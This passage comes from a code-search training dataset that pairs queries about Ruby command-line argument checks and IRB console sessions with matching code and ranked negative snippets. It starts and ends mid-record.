"0.6211641",
"0.6204412",
"0.61966467",
"0.61790484",
"0.617033",
"0.61620253",
"0.61532253",
"0.61518973",
"0.6145172",
"0.61374784",
"0.6133697",
"0.61208504",
"0.6109143",
"0.6107849",
"0.61035717",
"0.6092726",
"0.60918045",
"0.608872",
"0.6088298",
"0.60844535",
"0.6082135",
"0.60779315",
"0.60669976",
"0.60595894",
"0.60594827",
"0.60590106",
"0.6054021",
"0.60532004",
"0.60512936",
"0.6049252",
"0.6038067",
"0.6030602",
"0.60258526",
"0.60071135",
"0.60060215",
"0.6002058",
"0.5999694",
"0.59963554",
"0.59817076",
"0.59797806",
"0.59643066",
"0.5963496",
"0.59631336",
"0.59616154",
"0.59616154",
"0.59616154",
"0.59616154",
"0.59616154"
] |
0.0
|
-1
|
Check ARGV to see if someone asked for "console"
|
def requesting_console?
@requesting_console
end
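
The accessor above only reads a flag, which is presumably set while the command line is parsed. A minimal sketch of how that flag could be derived from ARGV; the parse_console_request helper name is hypothetical, not from the original source:

def parse_console_request(argv = ARGV)
  # True when the user passed "console" anywhere on the command line.
  @requesting_console = argv.include?("console")
end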
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def commandline\n ui == \"commandline\"\n end",
"def console?\n defined?(::Rails::Console) && $stdout.isatty && $stdin.isatty\n end",
"def validate_argv\n if ARGV.empty? then\n ARGV << \"start\"\n else\n if not %w{start stop restart zap status}.include? ARGV.first then\n $stderr.puts \"ERROR: invalid command '#{ARGV.first}'\"\n $stderr.puts\n $stderr.puts @opt_parser.help()\n exit 1\n end\n end\n end",
"def check_command_line\n if (!ARGV[0].nil? && ARGV[0].downcase == \"test\")\n @test = true\n elsif(ARGV.length < 2)\n puts \"USAGE: ruby main.rb <users_csv_file> <businesses_csv_file>\"\n puts \"OR\"\n puts \"USAGE: ruby main.rb test\"\n exit 1\n end\nend",
"def command_line_info\n puts \"\\nCommand line arguments:\\n\\n\"\n puts \"This program will accept a single command line argument on launch. Arguments can be passed to draughts_app.rb directly or to draughts.sh\\n\"\n puts \"Example: draughts.sh --help\\n\\n\"\n puts \"-h or --help Display all command line arguments\"\n puts \"-i or --info Display instructions on how to play\"\n puts \"-v or --version Display current application and Ruby version\"\n puts \"start Skip menu and immediately start a new game\"\n puts \"wins Print win counts\"\n puts \"\"\nend",
"def valid_argv?\n ARGV[0] && ARGV.all? { |arg| /.+:.+/ =~ arg }\nend",
"def check_usage\n unless ARGV.length == 1\n puts \"Forma de uso: restaura.rb paginaweb\"\n exit\n end\nend",
"def no_script?\n return false unless $ARGV.empty?\n\n print_error(\"You must specify a program to debug\")\n true\n end",
"def check_if_user_gave_input\n\n if ARGV.empty? == true\n puts \" Saisir une recherche après le fichier .rb\"\n abort.google_search\n else ARGV\n\n end\n end",
"def check_required\n # handle case where no files or text were passed (a tty is connected or STDIN is EOF in the latter case)\n return unless @options.files.to_a.empty? && (@stdin.tty? || @stdin.eof?) # to_a.empty? handles nil or empty case\n\n puts 'Either specify input file(s) or pipe text to STDIN'\n show_help\n end",
"def early_option?(args)\n if @options[:version]\n puts(\"boson #{Boson::VERSION}\")\n true\n elsif args.empty? || (@command.nil? && !@options[:execute])\n print_usage\n true\n else\n false\n end\n end",
"def console_output?\n false\n end",
"def checkCommandLine\r\n if ARGV.length != 2\r\n puts \"\\nUsage: sum <fileName> <numThreads>\\n\\n\"\r\n exit(1)\r\n end\r\nend",
"def tty?() end",
"def tty?() end",
"def tty?() end",
"def console=(_arg0); end",
"def console=(_arg0); end",
"def no_options_in_arguments?\n ARGV.grep(/^-/).empty? # Match args that start with - (or --). Those are the options.\n end",
"def gui?\n !ENV.fetch('GUI', '').empty?\nend",
"def tty?\n end",
"def tty?\n end",
"def check_arg()\n if ARGV.length > 1\n print \"ERROR: Too many command line args.\\n\"\n print \"USAGE: #{$PROGRAM_NAME} [--FixThemAll]\\n\"\n exit ERR_EXIT_ARGS2MANY\n end\n if ARGV.length == 1 && ARGV[0] != '--FixThemAll'\n print \"ERROR: Invalid argument on command line: '#{ARGV[0]}'\\n\"\n print \"USAGE: #{$PROGRAM_NAME} [--FixThemAll]\\n\"\n exit ERR_EXIT_ARGINVALID\n end\nend",
"def test_print?\n c = cli\n refute(c.print?)\n\n c = cli(['-p'])\n assert(c.print?)\n end",
"def console; end",
"def console; end",
"def exec_exist?(*args)\n require \"tty-which\"\n TTY::Which.exist?(*args)\n end",
"def exec_exist?(*args)\n require 'tty-which'\n TTY::Which.exist?(*args)\n end",
"def exec_exist?(*args)\n require 'tty-which'\n TTY::Which.exist?(*args)\n end",
"def interactive?\n defined?(::Rails::Console) && $stdout.isatty && $stdin.isatty\n end",
"def validate_arguments()\n usage unless ARGV.count > 0\nend",
"def has_any?\n peek_console_input.size > 0\n end",
"def console_for(target)\n puts \"== ENTERING CONSOLE MODE. ==\\nType 'exit' to move on.\\nContext: #{target.inspect}\"\n\n begin\n oldargs = ARGV.dup\n ARGV.clear\n IRB.conf[:DEFAULT_OBJECT] = target\n IRB.start\n ensure\n ARGV.replace(oldargs)\n end\nend",
"def quit_with_usage_error\n quit_with_error( \"USAGE: ruby list_checker.rb <SCREEN_NAME>\" )\nend",
"def try_io_console\n require 'io/console'\n\n begin\n if output.tty? && IO.method_defined?(:winsize)\n yield output.winsize\n else\n false\n end\n rescue Errno::EOPNOTSUPP\n false\n end\n rescue LoadError\n warn 'no native io/console support' if @verbose\n false\n end",
"def get_command_line_argument\n if ARGV.empty?\n puts \"Usage: ruby lookup.rb <domain>\" \n exit\n end ARGV.first # get frst argument in commnad line\nend",
"def args_valid?\n\tARGV.size == 1 && File.exist?(ARGV[0]) || Dir.exist?(Dir.pwd + \"/\" + ARGV[0])\nend",
"def args_valid?\n\tARGV.size == 1 && File.exist?(ARGV[0]) || Dir.exist?(Dir.pwd + \"/\" + ARGV[0])\nend",
"def ensure_any_args\n if ARGV.size == 0\n $stderr.puts \"ERROR: Must provide the name of a koan\"\n exit -1\n end\nend",
"def show_command?\n ENV['DEBUG'] || ENV['SHOW_COMMAND']\n end",
"def right_type?\n ARGV[0].is_a?(String) && ARGV[1].is_number? && ARGV[2].is_number?\n end",
"def check_if_user_gave_input\n abort(\"mkdiruby: missing input\") if ARGV.empty?\n abort(\"mkdiruby: input contains more than one argument\") if ARGV.count > 1\nend",
"def console\nend",
"def has_scaleway_cmdline?\n if file_exist?(\"/proc/cmdline\") && file_read(\"/proc/cmdline\").include?(\"scaleway\")\n logger.trace(\"Plugin Scaleway: has_scaleway_cmdline? == true\")\n return true\n end\n logger.trace(\"Plugin Scaleway: has_scaleway_cmdline? == false\")\n false\n end",
"def shell?\n false\n end",
"def tty?()\n #This is a stub, used for indexing\n end",
"def arguments?\n @config.arguments == Cliqr::Config::ENABLE_CONFIG\n end",
"def prompting?\n verbose? || (STDIN.tty? && @io.kind_of?(StdioInputMethod) ||\n @io.kind_of?(ReidlineInputMethod) ||\n (defined?(ReadlineInputMethod) && @io.kind_of?(ReadlineInputMethod)))\n end",
"def console_for(bounding)\n puts \"== ENTERING CONSOLE MODE. ==\\nType 'exit' to move on.\\nContext: #{eval('self', bounding).inspect}\"\n\n begin\n oldargs = ARGV.dup\n ARGV.clear\n IRB.start_session(bounding)\n ensure\n ARGV.replace(oldargs)\n end\nend",
"def check_usage\n if ARGV[0].nil? \n puts \"Usage: differences.rb old-inventory new-inventory\"\n exit\n end\nend",
"def args?(args, min=1, max=nil)\n\t\t\tif not max then max = min end\n\t\t\tif (args.length < min or args.length > max or args[0] == \"-h\")\n\t\t\t\treturn false\n\t\t\tend\n\n\t\t\treturn true\n\t\tend",
"def main\n loop do\n # current path used for readline\n cmdline = Readline.readline(\"#{shell_format} \", true)\n break if %w[exit quit q].include?(cmdline)\n\n Readline::HISTORY.pop if %W[hist #{''}].include?(cmdline)\n check_type_of_command(cmdline)\n end\nend",
"def print_missing_sec_arg\n puts ARGV[0] + \" requires second argument\"\n print_usage\nend",
"def check_args(args)\r\n args.count == 1\r\n File.exist?(ARGV[0].to_s)\r\nrescue StandardError\r\n false\r\nend",
"def arguments_passed?\n !!(ARGV[0] && ARGV[1] && ARGV[2])\n end",
"def command_line\r\n ARGV.each do |arg|\r\n if arg == \"instructions\"\r\n instructions\r\n elsif arg == \"calculator\"\r\n ask_for_digits\r\n else\r\n \r\n end\r\n end\r\n \r\n end",
"def ShowPrompt(arg0 = nil)\n ret = _invoke(1610743953, [arg0], [VT_BSTR])\n @lastargs = WIN32OLE::ARGV\n ret\n end",
"def allowed_on_commandline?\n @deprecated == :allowed_on_commandline\n end",
"def tty?\n false\n end",
"def shell?\n @type == :shell\n end",
"def gui_enabled?\n !ENV.fetch('GUI', '').empty?\nend",
"def gui_enabled?\n !ENV.fetch('GUI', '').empty?\nend",
"def gui_enabled?\n !ENV.fetch('GUI', '').empty?\nend",
"def is_file_input?(command_line_arguments)\n\t\tcommand_line_arguments.any?\n\tend",
"def gui?; !ENV.fetch('OVJ_VM_GUI', '').empty?; end",
"def gui?; !ENV.fetch('OVJ_VM_GUI', '').empty?; end",
"def main(command_line_options=ARGV)\n parser = Slop::Parser.new cli_flags\n arguments = parse_arguments(command_line_options, parser)\n\n if arguments.key?(:ce) || arguments.key?(:ci) || arguments.key?(:h)\n if arguments.key?(:ci)\n\n end\n if arguments.key?(:ce)\n\n end\n if arguments.key?(:h)\n puts cli_flags\n end\n exit\n end\n\n elsif set?(arguments, :port)\n puts portquiz arguments[:port]\n elsif set?(arguments, :down)\n puts is_it_up arguments[:down]\n end",
"def helpAndVerFirstArg\n raise Trollop::HelpNeeded if ARGV.empty? || ARGV[0] == '--help' || ARGV[0] == '-h' # show help screen\n raise Trollop::VersionNeeded if ARGV[0] == '--version' || ARGV[0].downcase == '-v' # show version screen\nend",
"def command?(name)\n !which(name).nil?\n end",
"def get_console_input\n STDIN.noecho(&:gets).chomp\n end",
"def _tty?\n false\n end",
"def instruct_and_abort_if_user_gave_no_input\n if ARGV.empty?\n \tabort(\"Error - Search input empty - you shall enter '$ ruby google_searcher.rb 'your search on Google''\")\n end\nend",
"def color?\n $options[:color].nil? ? @outdev.tty? : $options[:color]\n end",
"def test_it_can_distinguish_i_through_main_menu\n runner = Runner.new\n $stdout = StringIO.new\n input = \"i\"\n result = runner.main_menu_options(input)\n\n assert_equal false, runner.play?(result)\n end",
"def check_usage\n unless ARGV.length == 2\n puts \"Usage: gen_vimwiki_dict.rb wiki_folder dict_filename\"\n exit\n end\nend",
"def check_no_extra_args!\n if @argv.length > 0\n Braid::Command.handle_error(\n Braid::BraidError.new('Extra argument(s) passed to command.'))\n end\n end",
"def console\n puts 'Entering debug console.'\n if RUBY_VERSION == '2.0.0'\n require 'byebug'\n byebug\n else\n require 'ruby-debug'\n Debugger.start\n debugger\n end\n puts 'Leaving debug console.'\n end",
"def winArgHack(file)\n ARGV.shift if !ARGV.empty? && ARGV[0] && File.exist?(ARGV[0]) && File.basename(ARGV[0]) == File.basename(file)\n end",
"def command?(name)\n !which(name).nil?\nend",
"def command?(name)\n !which(name).nil?\n end",
"def wrong_num_parameters?\n (ARGV.size != 1)\n end",
"def main\n if system(ARGV.join(\" \"))\n exit 0\n else\n main\n end\nend",
"def console\n @console ||= set_console\n @console\n end",
"def cmd_question argv\n setup argv\n msg run_cmd(\"?\")\n end",
"def terminal?; !!terminal_flag end",
"def terminal?; !!terminal_flag end",
"def command?(name)\n __getobj__.present?(name)\n end",
"def validate_and_parse_options\n # Checking ARGV validity *before* parse_options because parse_options\n # mangles ARGV in some situations\n if no_command_given?\n print_help_and_exit(1, NO_COMMAND_GIVEN)\n elsif no_subcommand_given?\n if (want_help? || want_version?)\n print_help_and_exit\n else\n print_help_and_exit(2, NO_COMMAND_GIVEN)\n end\n end\n end",
"def process_command_line_options\r\n begin\r\n defer, found = \"\", false\r\n opts = GetoptLong.new(\r\n [ \"--help\", \"-h\", \"-?\", GetoptLong::NO_ARGUMENT ],\r\n [ \"--load\", \"-l\", GetoptLong::REQUIRED_ARGUMENT ],\r\n [ \"--debug\", \"-d\", GetoptLong::NO_ARGUMENT ],\r\n [ \"--quit\", \"-q\", GetoptLong::NO_ARGUMENT ],\r\n [ \"--words\", \"-w\", GetoptLong::NO_ARGUMENT ])\r\n\r\n # Process the parsed options\r\n opts.each do |opt, arg|\r\n unless found\r\n puts; found = true\r\n end\r\n\r\n case opt\r\n when \"--debug\"\r\n @debug = true\r\n when \"--load\"\r\n defer << \"load\\\"#{arg}\\\" \"\r\n when \"--quit\"\r\n defer << \")quit \"\r\n when \"--words\"\r\n defer << \")words \"\r\n else\r\n fail SilentExit\r\n end\r\n end\r\n\r\n puts if found\r\n rescue Exception => e\r\n puts\r\n puts \"fOOrth available options:\"\r\n puts\r\n puts \"--help -h -? Display this message and exit.\"\r\n puts \"--load -l <filename> Load the specified fOOrth source file.\"\r\n puts \"--debug -d Default to debug ON.\"\r\n puts \"--quit -q Quit after processing the command line.\"\r\n puts \"--words -w List the current vocabulary.\"\r\n puts\r\n raise SilentExit\r\n end\r\n\r\n defer\r\n end",
"def check_usage # (1)\n unless ARGV.length == 2 \n puts \"Cannot Proceed With The Operation: Please provide 2 textfile to compare\"\n exit\n end\nend",
"def try_console\n # if console service is available\n\n console = @framework.service :console\n main_thread = Thread.current\n\n if console.nil?\n # No console service present, looping on main thread\n event_loop(main_thread)\n else\n # Console service found, starting console on the foreground event loop on background thread\n begin\n @event_thread = Thread.new do\n event_loop(main_thread)\n end\n\n run_console console\n rescue => e\n puts \"Exception caught (#{e}) on main thread, shutting down\"\n puts e.backtrace.first\n end\n end\n end",
"def StartScreen(start)\n puts ' __ ______ _____________________ __ ________ ______ '.center(CONSOLE_WIDTH)\n puts ' / |/ / | / ___/_ __/ ____/ __ \\/ |/ / _/ | / / __ \\ '.center(CONSOLE_WIDTH)\n puts ' / /|_/ / /| | \\__ \\ / / / __/ / /_/ / /|_/ // // |/ / / / /'.center(CONSOLE_WIDTH)\n puts ' / / / / ___ |___/ // / / /___/ _, _/ / / // // /| / /_/ / '.center(CONSOLE_WIDTH)\n puts '/_/ /_/_/ |_/____//_/ /_____/_/ |_/_/ /_/___/_/ |_/_____/ '.center(CONSOLE_WIDTH)\n if start\n puts \"├─────────────────────────────┤\".center(CONSOLE_WIDTH)\n puts \"│ ENTER to start │\".center(CONSOLE_WIDTH)\n puts \"└─────────────────────────────┘\".center(CONSOLE_WIDTH)\n print \"\".center(CONSOLE_WIDTH / 2)\n STDIN.getc\n system \"clear\" or system \"cls\" # Clears the terminal screen so it doesn't look cluttered\n else\n puts \"├─────┬─────┬─────┬─────┬─────┤\".center(CONSOLE_WIDTH)\n end\nend",
"def check_command_line\n if (ARGV.length != 2)\n usage\n exit 2\n end\n\n if $options[\"daemon\"]\n $options[\"daemon\"] = File.expand_path($options[\"daemon\"], File.dirname(__FILE__))\n unless is_writable_dir? $options[\"daemon\"]\n usage\n $stderr.puts \"Can not create a file in the daemon directory: %s\" % [$options[\"daemon\"]]\n exit 5\n end\n end\n\n $topdir = $options[\"daemon\"] || File.expand_path(File.dirname(__FILE__))\n\n if $options[\"player-log-dir\"]\n $options[\"player-log-dir\"] = File.expand_path($options[\"player-log-dir\"], $topdir)\n unless is_writable_dir?($options[\"player-log-dir\"])\n usage\n $stderr.puts \"Can not write a file in the player log dir: %s\" % [$options[\"player-log-dir\"]]\n exit 3\n end \n end\n\n if $options[\"pid-file\"] \n $options[\"pid-file\"] = File.expand_path($options[\"pid-file\"], $topdir)\n unless ShogiServer::is_writable_file? $options[\"pid-file\"]\n usage\n $stderr.puts \"Can not create the pid file: %s\" % [$options[\"pid-file\"]]\n exit 4\n end\n end\n\n if $options[\"floodgate-games\"]\n names = $options[\"floodgate-games\"].split(\",\")\n new_names = \n names.select do |name|\n ShogiServer::League::Floodgate::game_name?(name)\n end\n if names.size != new_names.size\n $stderr.puts \"Found a wrong Floodgate game: %s\" % [names.join(\",\")]\n exit 6\n end\n $options[\"floodgate-games\"] = new_names\n end\n\n if $options[\"floodgate-history\"]\n $stderr.puts \"WARNING: --floodgate-history has been deprecated.\"\n $options[\"floodgate-history\"] = nil\n end\n\n $options[\"max-moves\"] ||= ShogiServer::Default_Max_Moves\n $options[\"max-moves\"] = $options[\"max-moves\"].to_i\n\n $options[\"least-time-per-move\"] ||= ShogiServer::Default_Least_Time_Per_Move\n $options[\"least-time-per-move\"] = $options[\"least-time-per-move\"].to_i\nend",
"def terminal? # :nodoc:\n true\n end",
"def display_menu\n font_sml = TTY::Font.new(:straight)\n font_big = TTY::Font.new(:doom)\n font_col = Pastel.new\n system \"clear\"\n # if statement to detect if arguments given in command line\n if ARGV.length == 1\n puts font_sml.write(\"#{ARGV[0]}, Welcome to...\") \n ARGV.clear\n elsif ARGV.length > 1 && ARGV[1] == \"-s\"\n puts font_sml.write(\"#{ARGV[0]}, Welcome to...\") \n ARGV.clear\n random_character\n pre-game\n else\n puts font_sml.write(\"Welcome to...\")\n end\n puts font_col.red(font_big.write(\"RPSG\"))\n puts \"If you haven't played before, it is advisable to read the instructions.\"\n # displays game menu to player\n return $prompt.select(\"What would you like to do?\",\n [\"Start New Game\", \"View Instructions\", \"View Leaderboard\", \"Exit Game\"])\nend",
"def get_command_line_argument\n if ARGV.empty?\n puts \"Usage: ruby lookup.rb <Domain>\"\n exit\n end\n ARGV.first\nend",
"def arguments_valid?\n true if ['install','list','uninstall'].include?(@arguments[0])\n end",
"def is_launcher? (process)\n is_admin? or login == process.variables['launcher']\n end",
"def terminal?\n true\n end",
"def main(*args)\n #puts self.class # TODO: fix help\n raise NoCommandError\n end"
] |
[
"0.7050839",
"0.638266",
"0.6313518",
"0.63002616",
"0.6237337",
"0.62016934",
"0.5997924",
"0.59475183",
"0.5905552",
"0.5887037",
"0.5845508",
"0.58440936",
"0.58061516",
"0.5805057",
"0.5805057",
"0.5805057",
"0.5799348",
"0.5799348",
"0.57903284",
"0.5789808",
"0.57686764",
"0.57686764",
"0.57567817",
"0.57548475",
"0.57153904",
"0.57153904",
"0.57153344",
"0.57125884",
"0.57125884",
"0.5695422",
"0.567539",
"0.56698436",
"0.5623646",
"0.56085485",
"0.560795",
"0.56066996",
"0.56038827",
"0.56038827",
"0.5577258",
"0.55630183",
"0.55607826",
"0.55603945",
"0.5557592",
"0.55527925",
"0.55347914",
"0.55264926",
"0.5517491",
"0.5506222",
"0.55051386",
"0.5503461",
"0.54992384",
"0.5451312",
"0.54453075",
"0.5441817",
"0.543326",
"0.5432765",
"0.54263914",
"0.54119",
"0.54068583",
"0.5385344",
"0.5380426",
"0.5380426",
"0.5380426",
"0.53790945",
"0.5376329",
"0.5376329",
"0.53745383",
"0.5366767",
"0.53565186",
"0.53501964",
"0.53465664",
"0.5328803",
"0.53190315",
"0.531249",
"0.5308584",
"0.53003734",
"0.5296756",
"0.5280868",
"0.52774173",
"0.52732784",
"0.5273275",
"0.52711123",
"0.5265672",
"0.52642506",
"0.52641875",
"0.52641875",
"0.52602696",
"0.5248993",
"0.52419597",
"0.5240514",
"0.5233961",
"0.5233716",
"0.52305657",
"0.52293813",
"0.52264696",
"0.5224716",
"0.52237254",
"0.52216655",
"0.5214324",
"0.521277"
] |
0.6389698
|
1
|
Start up a new IRB console session giving the user access to the RbGCCXML parser instance to do realtime querying of the code they're trying to wrap
|
def start_console
puts "IRB Session starting. @parser is now available to you for querying your code. The extension object is available as 'self'"
IRB.start_session(binding)
end
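
Note: IRB.start_session is not a documented public IRB API and its availability varies across Ruby versions. A minimal alternative sketch, assuming Ruby 2.4+ where Binding#irb is available; @parser is the same instance variable referenced in the snippet above:

def start_console
  require 'irb'
  puts "IRB Session starting. @parser is now available to you for querying your code. The extension object is available as 'self'"
  # Opens an interactive IRB session in the current binding.
  binding.irb
end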
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def initialize(*args)\n ## maybe set some opts here, as in parse_opts in irb/init.rb?\n\n unless @@irb_setup_done\n @@irb_setup_done = true\n\n conf = IRB.conf\n \n if File.directory?(\"tmp\")\n conf[:HISTORY_FILE] = \"tmp/.irb_shell_history\"\n else\n conf[:HISTORY_FILE] = \".irb_shell_history\"\n end\n\n IRB.setup nil\n \n at_exit do\n IRB.irb_at_exit\n end\n end\n\n workspace = IRB::WorkSpace.new(*args)\n\n if conf[:SCRIPT] ## normally, set by parse_opts\n @irb = IRB::Irb.new(workspace, conf[:SCRIPT])\n else\n @irb = IRB::Irb.new(workspace)\n end\n\n conf[:IRB_RC].call(@irb.context) if conf[:IRB_RC]\n conf[:MAIN_CONTEXT] = @irb.context\n end",
"def console\n\t\t\tcla = as_class_name(@arguments.first)\tif @arguments.length == 1\n\t\t File.open(\"./tmp/irb-setup.rb\", 'w') do |f|\n\t\t f.puts \"# Initializes the environment for IRb.\"\n\t\t f.puts \"Experiment::Config::init #{@options.env.inspect}\"\n\t\t f.puts \"$: << '#{File.expand_path(\".\")}/'\"\n\t\t if @arguments.length == 1\n\t\t f.puts \"require 'experiments/#{@arguments.first}/#{@arguments.first}'\"\n\t\t f.puts \"def experiment\"\n \t\t f.puts \" @experiment ||= #{cla}.new :normal, #{@arguments.first.inspect}, OpenStruct.new(#{@options.marshal_dump})\"\n \t\t f.puts \"end\"\n \t\t f.puts \"experiment #load up the configs\"\n \t\t else\n \t\t f.puts 'Dir[\"./app/**/*.{rb,o,so,dll,bundle}\"].each{|e| require e.gsub(/\\.(rb|so|o|dll|bundle)$/, \"\") }'\n \t\t f.puts \"Experiment::Config::load '', #{options.opts.inspect}\"\n\t\t end\n\t\t \n\t\t end\n irb = RUBY_PLATFORM =~ /(:?mswin|mingw)/ ? 'irb.bat' : 'irb'\n libs = \" -r irb/completion\"\n libs << \" -r #{File.dirname(__FILE__) + \"/base\"}\"\n libs << \" -r./experiments/experiment\"\n libs << \" -r ./tmp/irb-setup.rb\"\n puts \"Loading #{@options.env} environment...\"\n exec \"#{irb} #{libs} --simple-prompt\"\n\t end",
"def cmd_irb(*args)\n\t\tprint_status(\"Starting IRB shell\")\n\t\tprint_status(\"The 'client' variable holds the meterpreter client\\n\")\n\n\t\tRex::Ui::Text::IrbShell.new(binding).run\n\tend",
"def reset_irb\n say \"Began new irb session\"\n @session = try_eval(\"!INIT!IRB!\")\n end",
"def start\n return if initialized\n puts copyright\n argv = ARGV\n ARGV.clear\n IRB.start\n ARGV.replace(argv)\n end",
"def console_for(bounding)\n puts \"== ENTERING CONSOLE MODE. ==\\nType 'exit' to move on.\\nContext: #{eval('self', bounding).inspect}\"\n\n begin\n oldargs = ARGV.dup\n ARGV.clear\n IRB.start_session(bounding)\n ensure\n ARGV.replace(oldargs)\n end\nend",
"def run_console\n require 'irb'\n require 'irb/completion'\n require 'pp'\n load_code\n connect_to_database true\n CloudCrowd::Server # Preload server to autoload classes.\n Object.send(:include, CloudCrowd)\n IRB.start\n end",
"def main\n\n # test\n\n # Console.new\n console_start\n end",
"def cmd_irb(*args)\n expressions = []\n\n # Parse the command options\n @@irb_opts.parse(args) do |opt, idx, val|\n case opt\n when '-e'\n expressions << val\n when '-h'\n return cmd_irb_help\n end\n end\n\n session = self\n framework = self.framework\n\n if expressions.empty?\n print_status('Starting IRB shell...')\n print_status(\"You are in the \\\"self\\\" (session) object\\n\")\n\n Rex::Ui::Text::IrbShell.new(self).run\n else\n # XXX: No vprint_status here\n if framework.datastore['VERBOSE'].to_s == 'true'\n print_status(\"You are executing expressions in #{binding.receiver}\")\n end\n\n expressions.each { |expression| eval(expression, binding) }\n end\n end",
"def safely_build_irb_instance(session, workspace)\n irb = IRB::Irb.allocate\n irb.instance_variable_set :@context, IRB::Context.new(irb, workspace, nil)\n irb.instance_variable_set :@signal_status, :IN_IRB\n irb.instance_variable_set :@scanner, RubyLex.new\n\n begin\n irb.context.main.extend IRB::ExtendCommandBundle\n rescue NameError, TypeError\n # Potential `NameError`: undefined method `irb_print_working_workspace' for class `#<Class:#420>'.\n # Ignore it.\n end\n\n irb.context.main.extend Commands.new(session)\n irb\n end",
"def open\n @is_running = true\n run_interpreter\n end",
"def start\n greeting\n console_search\n goodbye\n end",
"def console\n repo = Repo.new\n repo.attach\n\n unless repo.has_repository?\n abort \"Cannot launch console: ripe repo not initialized\"\n end\n\n # Do not send arguments to the REPL\n ARGV.clear\n\n Ripl.config[:prompt] = proc do\n # This is the only place I could think of placing +Hirb#enable+.\n Hirb.enable unless Hirb::View.enabled?\n 'ripe> '\n end\n\n # Launch the REPL session in the context of +WorkerController+.\n Ripl.start :binding => repo.controller.instance_eval { binding }\n end",
"def start()\n\t\tprintinfo \"start execute the usrpse wrapper now...\"\n\t\tprintinfo \"configure the system buffer size... \"\n\t\t#`sudo sysctl -w net.core.wmem_max=1048576`\n\t\t#`sudo sysctl -w net.core.rmem_max=50000000`\t\t\n\t\t \n\t\t# open a child process to execute the sensing binaries \n\t\tPTY.spawn @cmd do |r,w,p|\n\t\t\t# close the write pipe\n\t\t\tw.close\n\t\t\t# assign the process id to the global variable\n\t\t\t$pid_global=p\n\t\t\t# start the loop to read and process the output \n\t\t\tloop { \n\t\t\t\tline=r.gets\n\t\t\t\tputs line\n\t\t\t\tif @output_mode == 'OML'\t\n\t\t\t\t\tif line.split(',').length >= 3 \n\t\t \t\t\t\tif numeric?(line.split(',')[3])\n\t\t\t \t\t\t\teval(@oml_inject_str)\n\t\t\t \t\t\tend\n\t\t\t \t\tend\n\t\t\t \tend\n\t\t\t}\n\t\tend\n\tend",
"def irb\n if @console\n @console.show\n else\n # We need to address compiled RubyConsole via full java name... Why?\n @console ||= com.moneydance.modules.features.ruby.rb.RubyConsole.new self\n end\n end",
"def run\n Curses.init_screen\n\n init_style\n\n Curses.noecho\n Curses.curs_set 0 # invisible\n\n @message = RDoc::RI::Browser::Message.new\n\n @display = RDoc::RI::Browser::Display.new self\n @display.show HELP, nil, false\n\n trap_resume do\n event_loop\n end\n end",
"def start_interaction(sandbox=true)\n $__env__ = inspect_env\n puts \"Caller trace:\"\n Kernel.puts RMTools.format_trace(caller(2)).join(\"\\n\")\n puts \"Environment:\"\n $__env__.present\n $__binding__ = self\n if defined? SCRIPT_LINES__ and (file = caller(0)[0].parse(:caller).file) =~ /^\\(irb/\n SCRIPT_LINES__[\"(#{file[1..-2].next_version '#'})\"] = []\n end\n \n $__MAIN__.irb$__binding__\n \n if sandbox\n self.eval($__env__.keys.map {|k, v| \"#{k} = $__env__[#{k.inspect}]\" if k != 'self'} * '; ')\n end\n $__env__ = nil\n end",
"def run\n if (! @running.nil?)\n raise \"Already running\"\n end\n info(VERSION_STRING)\n resetState\n comm = Hash.new\n comm[:comms_name] = @managerName\n comm[:handler] = self\n comm[:createflag] = true\n comm[:config] = @config[:communicator]\n RMCommunicator.instance.init(comm)\n RMCommunicator.instance.reset\n\n @running = ConditionVariable.new\n if @interactive\n require 'irb'\n ARGV.clear\n ARGV << \"--simple-prompt\"\n ARGV << \"--noinspect\"\n IRB.start()\n else\n @mutex = Mutex.new\n @mutex.synchronize {\n @running.wait(@mutex)\n }\n end\n end",
"def start\n @cmd.parse\n end",
"def load\n Pry.initial_session_setup\n define_additional_commands\n\n Pry.config.hooks.add_hook(:when_started, :start_non_interactively) do |o, t, _pry_|\n non_interactive_mode(_pry_)\n end\n\n Pry.start(Pry.toplevel_binding,\n :input => @content,\n :input_stack => [StringIO.new(\"exit-all\\n\")])\n end",
"def initialize\n IRB.__send__(:set_encoding, Reline.encoding_system_needs.name, override: false)\n super\n\n @line_no = 0\n @line = []\n @eof = false\n\n @stdin = ::IO.open(STDIN.to_i, :external_encoding => IRB.conf[:LC_MESSAGES].encoding, :internal_encoding => \"-\")\n @stdout = ::IO.open(STDOUT.to_i, 'w', :external_encoding => IRB.conf[:LC_MESSAGES].encoding, :internal_encoding => \"-\")\n\n if Reline.respond_to?(\"basic_word_break_characters=\")\n Reline.basic_word_break_characters = IRB::InputCompletor::BASIC_WORD_BREAK_CHARACTERS\n end\n Reline.completion_append_character = nil\n Reline.completer_quote_characters = ''\n Reline.completion_proc = IRB::InputCompletor::CompletionProc\n Reline.output_modifier_proc =\n if IRB.conf[:USE_COLORIZE]\n proc do |output, complete: |\n next unless IRB::Color.colorable?\n IRB::Color.colorize_code(output, complete: complete)\n end\n else\n proc do |output|\n Reline::Unicode.escape_for_print(output)\n end\n end\n Reline.dig_perfect_match_proc = IRB::InputCompletor::PerfectMatchedProc\n Reline.autocompletion = IRB.conf[:USE_AUTOCOMPLETE]\n if IRB.conf[:USE_AUTOCOMPLETE]\n Reline.add_dialog_proc(:show_doc, SHOW_DOC_DIALOG, Reline::DEFAULT_DIALOG_CONTEXT)\n end\n end",
"def console_for(target)\n puts \"== ENTERING CONSOLE MODE. ==\\nType 'exit' to move on.\\nContext: #{target.inspect}\"\n\n begin\n oldargs = ARGV.dup\n ARGV.clear\n IRB.conf[:DEFAULT_OBJECT] = target\n IRB.start\n ensure\n ARGV.replace(oldargs)\n end\nend",
